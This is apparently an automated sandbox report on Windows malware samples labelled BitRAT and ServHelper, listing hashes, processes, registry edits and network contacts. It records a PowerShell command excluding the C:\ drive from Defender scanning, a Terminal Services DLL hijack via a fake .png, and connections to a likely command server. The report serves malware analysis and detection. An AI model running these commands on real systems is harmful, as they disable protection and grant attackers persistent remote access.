| SHA1 | 58fd7d50c2dca464a128f5e0435d6f0515e62073 |
| SHA256 | 6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9 |
| SHA512 | 5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7 |
\Windows\Branding\mediasrv.png
| MD5 | 271eacd9c9ec8531912e043bc9c58a31 |
| SHA1 | c86e20c2a10fd5c5bae4910a73fd62008d41233b |
| SHA256 | 177d6aab26c15ecf87f29f92ad0eaff355d195de1c0ef17d9cb9b7483c288934 |
| SHA512 | 87375d3e0c2505ff8d5860db4a9a2cbb88da73f492f2be937b1dfd1afa37133061b7c69121727728835eaf545ce1850ec4889bad33366b8d4dadd7838af791c0 |
\Windows\Branding\mediasvc.png
| MD5 | 1fa9c1e185a51b6ed443dd782b880b0d |
| SHA1 | 50145abf336a196183882ef960d285bd77dd3490 |
| SHA256 | f25560518e8bebbc0abdde4c0241833e432ad4c56f934bb18067c1abf7305959 |
| SHA512 | 16bd50a904fa062f8ec6e41f00000da5d0221164c3eda90bc1791e195b25ef74bb9e1264d7536c204f9a01ca1489ae43484ceb1e7bb4f650aacf90fa16f1c9fc |
\??\PIPE\lsarpc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
Analysis: behavioral14
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
140s
Command Line
Signatures
Command and Scripting Interpreter: JavaScript
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\39c1e12e0ada85fa835b623a4698345bf95372bea57a7d3a5070ea1d5d5d825c.js
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral21
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win10v2004-20241007-en
Max time kernel
147s
Max time network
144s
Command Line
Signatures
BitRAT
Bitrat family
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4568 set thread context of 2704 | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
"C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Ramerkpoygerkjyr.vbs"
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Users\Admin\AppData\Local\Temp\685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Mocenter\Moupdate.exe'
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.117.19.2.in-addr.arpa | udp |
| PL | 185.244.30.28:4898 | tcp | |
| PL | 185.244.30.28:4898 | tcp | |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| PL | 185.244.30.28:4898 | tcp |
Files
memory/4568-0-0x0000000074ECE000-0x0000000074ECF000-memory.dmp
memory/4568-1-0x0000000000AF0000-0x0000000000D34000-memory.dmp
memory/4568-2-0x0000000005D20000-0x00000000062C4000-memory.dmp
memory/4568-3-0x0000000005610000-0x00000000056A2000-memory.dmp
memory/4568-4-0x0000000005600000-0x000000000560A000-memory.dmp
memory/4568-5-0x0000000074EC0000-0x0000000075670000-memory.dmp
memory/4568-6-0x0000000074ECE000-0x0000000074ECF000-memory.dmp
memory/4568-7-0x0000000074EC0000-0x0000000075670000-memory.dmp
memory/4568-8-0x0000000006CC0000-0x0000000006ECC000-memory.dmp
memory/4568-9-0x0000000006F50000-0x0000000006FC6000-memory.dmp
memory/4568-10-0x0000000006ED0000-0x0000000006F40000-memory.dmp
memory/4568-20-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-26-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-74-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-72-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-70-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-68-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-66-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-64-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-62-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-60-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-58-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-56-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-54-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-50-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-48-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-46-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-44-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-42-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-40-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-38-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-36-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-34-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-32-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-30-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-28-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-24-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-22-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-18-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-16-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-14-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-12-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-52-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-11-0x0000000006ED0000-0x0000000006F3A000-memory.dmp
memory/4568-2031-0x0000000007BB0000-0x0000000007BCE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_Ramerkpoygerkjyr.vbs
| MD5 | 4c3b08d7af0401a66aa7934a5f533276 |
| SHA1 | b5638475f3422d083a825a88a753db5e05666923 |
| SHA256 | 59f8fbd0ff79380d28c47847b14b846dd52ff36b00a08690c4cf5292b8dc5dc4 |
| SHA512 | 5497a31e5d47d2baa3bc43b6677fd8f35b55ed79e25bb831f5ee7c48c32e9aed9323a9b8d96dfc7ebe6ca3d3964f2d85ebaa2203a25b4b142ef2334542d87a0f |
memory/2704-2041-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/4568-2042-0x0000000074EC0000-0x0000000075670000-memory.dmp
memory/5156-2043-0x0000000002C70000-0x0000000002CA6000-memory.dmp
memory/5156-2044-0x0000000005720000-0x0000000005D48000-memory.dmp
memory/5156-2045-0x00000000055B0000-0x00000000055D2000-memory.dmp
memory/5156-2046-0x0000000005E00000-0x0000000005E66000-memory.dmp
memory/5156-2047-0x0000000005F20000-0x0000000005F86000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_for1a5p4.chx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5156-2057-0x0000000005F90000-0x00000000062E4000-memory.dmp
memory/5156-2058-0x0000000006560000-0x000000000657E000-memory.dmp
memory/5156-2059-0x0000000006590000-0x00000000065DC000-memory.dmp
memory/2704-2061-0x0000000070920000-0x0000000070959000-memory.dmp
memory/5156-2069-0x0000000006B40000-0x0000000006B72000-memory.dmp
memory/5156-2070-0x0000000070D60000-0x0000000070DAC000-memory.dmp
memory/5156-2080-0x0000000007730000-0x000000000774E000-memory.dmp
memory/5156-2081-0x0000000007760000-0x0000000007803000-memory.dmp
memory/5156-2082-0x0000000007EE0000-0x000000000855A000-memory.dmp
memory/5156-2083-0x0000000007890000-0x00000000078AA000-memory.dmp
memory/5156-2084-0x00000000078F0000-0x00000000078FA000-memory.dmp
memory/5156-2085-0x0000000007B20000-0x0000000007BB6000-memory.dmp
memory/5156-2086-0x0000000007A90000-0x0000000007AA1000-memory.dmp
memory/5156-2087-0x0000000007AC0000-0x0000000007ACE000-memory.dmp
memory/5156-2088-0x0000000007AD0000-0x0000000007AE4000-memory.dmp
memory/5156-2089-0x0000000007BE0000-0x0000000007BFA000-memory.dmp
memory/5156-2090-0x0000000007B10000-0x0000000007B18000-memory.dmp
memory/2704-2093-0x0000000000400000-0x00000000007CE000-memory.dmp
memory/2704-2096-0x0000000075780000-0x00000000757B9000-memory.dmp
memory/2704-2099-0x0000000075780000-0x00000000757B9000-memory.dmp
memory/2704-2100-0x0000000070920000-0x0000000070959000-memory.dmp
memory/2704-2101-0x00000000705F0000-0x0000000070629000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-11-21 20:43
Reported
2024-11-21 20:46
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
151s
Command Line
Signatures
ServHelper
Servhelper family
Grants admin privileges
Remote Service Session Hijacking: RDP Hijacking
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net1.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net1.exe | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Indicator Removal: Network Share Connection Removal
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net1.exe | N/A |
Modifies RDP port number used by Windows
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Server Software Component: Terminal Services DLL
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png" | C:\Windows\system32\reg.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Indicator Removal: File Deletion
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\rfxvmt.dll | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_wyobeegv.2jk.ps1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\Basebrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIAD92.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIADB3.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIADC4.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIADD4.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_rr1w3eym.2gg.psm1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIADA3.tmp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\shellbrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Permission Groups Discovery: Local Groups
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Flags = "33" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
